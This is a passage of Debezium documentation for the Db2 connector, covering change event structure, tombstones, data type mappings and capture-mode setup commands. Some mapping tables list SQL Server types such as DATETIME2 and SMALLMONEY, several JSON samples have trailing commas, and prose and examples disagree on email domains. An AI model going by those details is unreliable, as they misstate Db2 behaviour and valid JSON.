{ \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-db2-connector}#db2-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See {link-prefix}:{link-db2-connector}#db2-topic-names[topic names].\n\n[WARNING]\n====\nThe {prodname} Db2 connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. 
Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n\nAlso, Db2 names for databases, schemas, and tables can be case sensitive. This means that the connector could emit event records for more than one table to the same Kafka topic.\n====\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:about-keys-in-debezium-db2-change-events[]\n* xref:about-values-in-debezium-db2-change-events[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-db2-change-events\n\/\/ Title: About keys in {prodname} db2 change events\n[[db2-change-event-keys]]\n=== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's `PRIMARY KEY` (or unique constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n ID INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n FIRST_NAME VARCHAR(255) NOT NULL,\n LAST_NAME VARCHAR(255) NOT NULL,\n EMAIL VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure. In JSON, it looks like this:\n\n[source,json,indent=0]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [ \/\/ <2>\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n }\n ],\n \"optional\": false, \/\/ <3>\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Key\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"ID\": 1004\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`mydatabase.MYSCHEMA.CUSTOMERS.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: +\n\n* `mydatabase` is the name of the connector that generated this event. +\n* `MYSCHEMA` is the database schema that contains the table that was changed. 
+\n* `CUSTOMERS` is the table that was updated.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `ID` field whose value is `1004`.\n\n|===\n\n\/\/\/\/\n[NOTE]\n====\nAlthough the `column.exclude.list` connector configuration property allows you to omit columns from event values, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key is null. The rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\n\/\/\/\/\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-db2-change-events\n\/\/ Title: About values in {prodname} Db2 change events\n[[db2-change-event-values]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n ID INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n FIRST_NAME VARCHAR(255) NOT NULL,\n LAST_NAME VARCHAR(255) NOT NULL,\n EMAIL VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\nThe event value portion of every change event for the `customers` table specifies the same schema. The event value's payload varies according to the event type:\n\n* <<db2-create-events,_create_ events>>\n* <<db2-update-events,_update_ events>>\n* <<db2-delete-events,_delete_ events>>\n\n[[db2-create-events]]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"FIRST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"LAST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"EMAIL\"\n }\n ],\n \"optional\": true,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"FIRST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"LAST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"EMAIL\"\n }\n ],\n \"optional\": true,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n 
\"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"change_lsn\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"commit_lsn\"\n },\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.db2.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"john.doe@example.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559729468470,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000758:0003\",\n \"commit_lsn\": \"00000027:00000758:0005\",\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559729471739 \/\/ <10>\n }\n}\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`mydatabase.MYSCHEMA.CUSTOMERS.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. The connector uses this schema for all rows in the `MYSCHEMA.CUSTOMERS` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._schemaName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.db2.Source` is the schema for the payload's `source` field. This schema is specific to the Db2 connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`mydatabase.MYSCHEMA.CUSTOMERS.Envelope` is the schema for the overall structure of the payload, where `mydatabase` is the database, `MYSCHEMA` is the schema, and `CUSTOMERS` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that JSON representations of events are much larger than the rows they describe. This is because a JSON representation must include the schema portion and the payload portion of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\n|An optional field that specifies the state of the row before the event occurred. 
When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content.\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `ID`, `FIRST_NAME`, `LAST_NAME`, and `EMAIL` columns.\n\n|8\n|`source`\na| Mandatory field that describes the source metadata for the event. The `source` structure shows Db2 information about this change, which provides traceability. It also has information you can use to compare to other events in the same topic or in other topics to know whether this event occurred before, after, or as part of the same commit as other events. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|10\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[[db2-update-events]]\n=== _update_ events\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the _update_ event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"john.doe@example.org\"\n },\n \"after\": { \/\/ <2>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"noreply@example.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559729995937,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000ac0:0002\",\n \"commit_lsn\": \"00000027:00000ac0:0007\",\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1559729998706 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. 
In this example, note that the `EMAIL` value is `john.doe@example.com`.\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `EMAIL` value is now `noreply@example.com`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure contains the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event has different LSNs. You can use this information to compare this event to other events to know whether this event occurred before, after, or as part of the same commit as other events. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-db2-connector}#db2-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row.\n====\n\n[[db2-delete-events]]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The event value `payload` in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"noreply@example.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559730445243,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000db0:0005\",\n \"commit_lsn\": \"00000027:00000db0:0007\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1559730450205 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. 
In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and LSN field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row. The old values are included because some consumers might require them in order to properly handle the removal.\n\nDb2 connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[[db2-tombstone-events]]\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s Db2 connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-db2-connectors-map-data-types\n\/\/ Title: How {prodname} Db2 connectors map data types\n[[db2-data-types]]\n== Data type mappings\n\nDb2's data types are described in https:\/\/www.ibm.com\/support\/knowledgecenter\/en\/SSEPGG_11.5.0\/com.ibm.db2.luw.sql.ref.doc\/doc\/r0008483.html[Db2 SQL Data Types].\n\nThe Db2 connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. How that value is represented in the event depends on the Db2 data type of the column. 
This section describes these mappings.\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:db2-basic-types[]\n* xref:db2-temporal-types[]\n* xref:db2-timestamp-types[]\n* xref:db2-decimal-types[]\n\nendif::product[]\n\n[id=\"db2-basic-types\"]\n=== Basic types\n\nThe following table describes how the connector maps each of the Db2 data types to a _literal type_ and a _semantic type_ in event fields.\n\n* _literal type_ describes how the value is represented using Kafka Connect schema types: `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\n\n* _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\n.Mappings for Db2 basic data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type \n|Literal type (schema type) \n|Semantic type (schema name) and Notes\n\n|`BOOLEAN`\n|`BOOLEAN`\n|Only snapshots can be taken from tables with BOOLEAN type columns. Currently SQL Replication on Db2 does not support BOOLEAN, so Debezium can not perform CDC on those tables. Consider using a different type.\n\n\n|`BIGINT`\n|`INT64`\n|n\/a\n\n|`BINARY`\n|`BYTES`\n|n\/a\n\n|`BLOB`\n|`BYTES`\n|n\/a\n\n|`CHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`CLOB`\n|`STRING`\n|n\/a\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nString representation of a timestamp without timezone information\n\n|`DECFLOAT`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n\n|`DECIMAL`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n\n|`DBCLOB`\n|`STRING`\n|n\/a\n\n|`DOUBLE`\n|`FLOAT64`\n|n\/a\n\n|`INTEGER`\n|`INT32`\n|n\/a\n\n|`REAL`\n|`FLOAT32`\n|n\/a\n\n|`SMALLINT`\n|`INT16`\n|n\/a\n\n|`TIME`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nString representation of a time without timezone information\n\n|`TIMESTAMP`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nString representation of a timestamp without timezone information\n\n|`VARBINARY`\n|`BYTES`\n|n\/a\n\n|`VARCHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`VARGRAPHIC`\n|`STRING`\n|n\/a\n\n|`XML`\n|`STRING`\n|`io.debezium.data.Xml` +\n +\nString representation of an XML document\n|===\n\nIf present, a column's default value is propagated to the corresponding field's Kafka Connect schema. Change events contain the field's default value unless an explicit column value had been given. Consequently, there is rarely a need to obtain the default value from the schema.\nifdef::community[]\nPassing the default value helps satisfy compatibility rules when {link-prefix}:{link-avro-serialization}[using Avro] as the serialization format together with the Confluent schema registry.\nendif::community[]\n\n[[db2-temporal-types]]\n=== Temporal types\n\nOther than Db2's `DATETIMEOFFSET` data type, which contains time zone information, how temporal types are mapped depends on the value of the `time.precision.mode` connector configuration property. The following sections describe these mappings:\n\n* xref:db2-time-precision-mode-adaptive[`time.precision.mode=adaptive`]\n* xref:db2-time-precision-mode-connect[`time.precision.mode=connect`]\n\n[[db2-time-precision-mode-adaptive]]\n.`time.precision.mode=adaptive`\nWhen the `time.precision.mode` configuration property is set to `adaptive`, the default, the connector determines the literal type and semantic type based on the column's data type definition. 
This ensures that events _exactly_ represent the values in the database.\n\n.Mappings when `time.precision.mode` is `adaptive`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME(0)`, `TIME(1)`, `TIME(2)`, `TIME(3)`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nRepresents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIME(4)`, `TIME(5)`, `TIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the number of microseconds past midnight, and does not include timezone information.\n\n|`TIME(7)`\n|`INT64`\n|`io.debezium.time.NanoTime` +\n +\nRepresents the number of nanoseconds past midnight, and does not include timezone information.\n\n|`DATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(0)`, `DATETIME2(1)`, `DATETIME2(2)`, `DATETIME2(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(4)`, `DATETIME2(5)`, `DATETIME2(6)`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(7)`\n|`INT64`\n|`io.debezium.time.NanoTimestamp` +\n +\nRepresents the number of nanoseconds past the epoch, and does not include timezone information.\n|===\n\n[[db2-time-precision-mode-connect]]\n.`time.precision.mode=connect`\nWhen the `time.precision.mode` configuration property is set to `connect`, the connector uses Kafka Connect logical types. This may be useful when consumers can handle only the built-in Kafka Connect logical types and are unable to handle variable-precision time values. However, since Db2 supports tenth of a microsecond precision, the events generated by a connector with the `connect` time precision *results in a loss of precision* when the database column has a _fractional second precision_ value that is greater than 3.\n\n.Mappings when `time.precision.mode` is `connect`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`org.apache.kafka.connect.data.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Time` +\n +\nRepresents the number of milliseconds since midnight, and does not include timezone information. 
Db2 allows `P` to be in the range 0-7 to store up to tenth of a microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n\n|`DATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information. Db2 allows `P` to be in the range 0-7 to store up to tenth of a microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n|===\n\n[[db2-timestamp-types]]\n=== Timestamp types\n\nThe `DATETIME`, `SMALLDATETIME` and `DATETIME2` types represent a timestamp without time zone information.\nSuch columns are converted into an equivalent Kafka Connect value based on UTC. For example, the `DATETIME2` value \"2018-06-20 15:13:16.945104\" is represented by an `io.debezium.time.MicroTimestamp` with the value \"1529507596945104\".\n\nThe timezone of the JVM running Kafka Connect and {prodname} does not affect this conversion.\n\n[[db2-decimal-types]]\n=== Decimal types\n\n[cols=\"27%a,18%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`NUMERIC[(P[,S])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`DECIMAL[(P[,S])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`SMALLMONEY`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point iss shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`MONEY`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n|===\n\n\/\/ Type: procedure\n\/\/ ModuleID: setting-up-db2-to-run-a-debezium-connector\n\/\/ Title: Setting up Db2 to run a {prodname} connector\n[[setting-up-db2]]\n== Set up\n\nA database administrator must put tables into capture mode before you can run a {prodname} Db2 connector to capture changes that are committed to a Db2 database. To put tables into capture mode, {prodname} provides a set of user-defined functions (UDFs) for your convenience. The procedure here shows how to install and run these management UDFs. 
Alternatively, you can run Db2 control commands to put tables into capture mode.\n\nThis procedure assumes that you are logged in as the `db2instl` user, which is the default instance and user name when using the Db2 docker container image.\n\n.Prerequisites\n\n* On the machine on which Db2 is running, the content in `debezium-connector-db2\/src\/test\/docker\/db2-cdc-docker` is available in the `$HOME\/asncdctools\/src` directory.\n\n.Procedure\n\n. Compile the {prodname} management UDFs on the Db2 server host by using the `bldrtn`\ncommand provided with Db2:\n+\n[source,shell]\n----\ncd $HOME\/asncdctools\/src\n----\n+\n[source,shell]\n----\n.\/bldrtn asncdc\n----\n\n. Start the database if it is not already running. Replace `DB_NAME` with the name of the database that you want {prodname} to connect to.\n+\n[source,shell]\n----\ndb2 start db DB_NAME\n----\n\n. Ensure that JDBC can read the Db2 metadata catalog:\n+\n[source,shell]\n----\ncd $HOME\/sqllib\/bnd\n----\n+\n[source,shell]\n----\ndb2 bind db2schema.bnd blocking all grant public sqlerror continue\n----\n\n. Ensure that the database was recently backed-up. The ASN agents must have a recent starting point to read from. If you need to perform a backup, run the following commands, which prune the data so that only the most recent version is available. If you do not need to retain the older versions of the data, specify `dev\/null` for the backup location.\n\n.. Back up the database. Replace `DB_NAME` and `BACK_UP_LOCATION` with appropriate values:\n+\n[source,shell]\n----\ndb2 backup db DB_NAME to BACK_UP_LOCATION\n----\n\n.. Restart the database:\n+\n[source,shell]\n----\ndb2 restart db DB_NAME\n----\n\n. Connect to the database to install the {prodname} management UDFs. It is assumed that you are logged in as the `db2instl` user so the UDFs should be installed on the `db2inst1` user.\n+\n[source,shell]\n----\ndb2 connect to DB_NAME\n----\n\n. Copy the {prodname} management UDFs and set permissions for them:\n+\n[source,shell]\n----\ncp $HOME\/asncdctools\/src\/asncdc $HOME\/sqllib\/function\n----\n+\n[source,shell]\n----\nchmod 777 $HOME\/sqllib\/function\n----\n\n. Enable the {prodname} UDF that starts and stops the ASN capture agent:\n+\n[source,shell]\n----\ndb2 -tvmf $HOME\/asncdctools\/src\/asncdc_UDF.sql\n----\n\n. Create the ASN control tables:\n+\n[source,shell]\n----\n$ db2 -tvmf $HOME\/asncdctools\/src\/asncdctables.sql\n----\n\n. Enable the {prodname} UDF that adds tables to capture mode and removes tables from capture mode:\n+\n[source,shell]\n----\n$ db2 -tvmf $HOME\/asncdctools\/src\/asncdcaddremove.sql\n----\n+\nAfter you set up the Db2 server, use the UDFs to control Db2 replication (ASN) with SQL commands. Some of the UDFs expect a return value in which case you use the SQL `VALUE` statement to invoke them. For other UDFs, use the SQL `CALL` statement.\n\n. Start the ASN agent:\n+\n[source,sql]\n----\nVALUES ASNCDC.ASNCDCSERVICES('start','asncdc');\n----\n\n. Put tables into capture mode. Invoke the following statement for each table that you want to put into capture. Replace `MYSCHEMA` with the name of the schema that contains the table you want to put into capture mode. Likewise, replace `MYTABLE` with the name of the table to put into capture mode:\n+\n[source,sql]\n----\nCALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');\n----\n\n. 
